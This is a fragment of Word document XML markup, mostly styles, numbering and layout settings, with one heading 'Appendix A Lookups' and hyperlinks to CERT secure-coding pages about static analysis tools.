          <w:color w:val="000000"/>
        </w:rP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0" w:name="_Toc52464081"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rP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1" w:name="_Toc52464082"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rP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2" w:name="_Toc52464083"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rP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3" w:name="_Toc52464084"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Appendix A Lookups</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="2264544C" w14:textId="77777777" w:rsidR="00171556" w:rsidRPr="00171556" w:rsidRDefault="00171556" w:rsidP="00171556"/>
    <w:p w14:paraId="127B45D0" w14:textId="7E02B229" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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65"/>
      <w:footerReference w:type="default" r:id="rId6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8A858" w14:textId="77777777" w:rsidR="00254C20" w:rsidRDefault="00254C20">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0001EC23" w14:textId="77777777" w:rsidR="00254C20" w:rsidRDefault="0025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95B44" w14:textId="77777777" w:rsidR="00254C20" w:rsidRDefault="00254C20">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B656C5F" w14:textId="77777777" w:rsidR="00254C20" w:rsidRDefault="00254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CAC36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5C4E09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F68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96D7A8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9360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9"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="6"/>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17B23"/>
    <w:rsid w:val="0008274A"/>
    <w:rsid w:val="000E3024"/>
    <w:rsid w:val="00171556"/>
    <w:rsid w:val="0019484D"/>
    <w:rsid w:val="001A3C43"/>
    <w:rsid w:val="001D4766"/>
    <w:rsid w:val="002474B4"/>
    <w:rsid w:val="00254C20"/>
    <w:rsid w:val="00305753"/>
    <w:rsid w:val="00332392"/>
    <w:rsid w:val="00377AB5"/>
    <w:rsid w:val="00381847"/>
    <w:rsid w:val="003B0A5C"/>
    <w:rsid w:val="003C2366"/>
    <w:rsid w:val="003F364F"/>
    <w:rsid w:val="004E12CE"/>
    <w:rsid w:val="005A3503"/>
    <w:rsid w:val="005E4290"/>
    <w:rsid w:val="006E33E1"/>
    <w:rsid w:val="00713460"/>
    <w:rsid w:val="00732A79"/>
    <w:rsid w:val="007E1C77"/>
    <w:rsid w:val="00865183"/>
    <w:rsid w:val="00885C97"/>
    <w:rsid w:val="00895AA1"/>
    <w:rsid w:val="008C066B"/>
    <w:rsid w:val="008C3FC6"/>
    <w:rsid w:val="0093573C"/>
    <w:rsid w:val="0094639F"/>
    <w:rsid w:val="009B710E"/>
    <w:rsid w:val="00A04F5E"/>
    <w:rsid w:val="00A27109"/>
    <w:rsid w:val="00A64600"/>
    <w:rsid w:val="00B475A1"/>
    <w:rsid w:val="00B64D61"/>
    <w:rsid w:val="00B83D35"/>
    <w:rsid w:val="00B92A44"/>
    <w:rsid w:val="00B96EE8"/>
    <w:rsid w:val="00BB58FE"/>
    <w:rsid w:val="00BC2B54"/>
    <w:rsid w:val="00BE6AD2"/>
    <w:rsid w:val="00C07BCD"/>
    <w:rsid w:val="00C159E4"/>
    <w:rsid w:val="00C73007"/>
    <w:rsid w:val="00CB47D6"/>
    <w:rsid w:val="00CE3AA7"/>
    <w:rsid w:val="00D14250"/>
    <w:rsid w:val="00D30268"/>
    <w:rsid w:val="00DA3CCE"/>
    <w:rsid w:val="00E12AE7"/>
    <w:rsid w:val="00E769D9"/>
    <w:rsid w:val="00E86960"/>
    <w:rsid w:val="00E90D40"/>
    <w:rsid w:val="00E92B40"/>
    <w:rsid w:val="00EF2377"/>
    <w:rsid w:val="00F21822"/>
    <w:rsid w:val="00F23C27"/>
    <w:rsid w:val="00F30B1A"/>
    <w:rsid w:val="00F51FA8"/>
    <w:rsid w:val="00F63972"/>
    <w:rsid w:val="00F65974"/>
    <w:rsid w:val="00F72634"/>
    <w:rsid w:val="00F7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3F364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27109"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008C066B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C066B"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C0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7212">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="152257231">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="195702478">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="191042002">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="240221440">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="356272154">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="366151487">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1281569904">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1080903320">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1468157653">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1720471578">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="377896393">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="610016840">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="388958232">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="43874577">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="397292721">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2080251976">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="457577115">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="533276919">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1188910628">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="798493342">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="889537843">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="960644996">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="977607406">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1858233256">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1407073141">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="901405797">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1420448180">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="960112045">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1503813820">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="61100246">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1603301854">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1746802749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1746951148">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1374310321">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1850757538">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1851481326">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="219176582">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="225"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1882284672">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1969161611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2021203163">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2074698661">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210425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Axivion+Bauhaus+Suite" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152428" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.viva64.com/en/w/v749/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Polyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=142409849" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046345" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Parasoft" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.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olyspace+Bug+Finder" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wiki.sei.cmu.edu/confluence/display/c/Kloc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arasoft" TargetMode="External"/><Relationship Id="rId32" 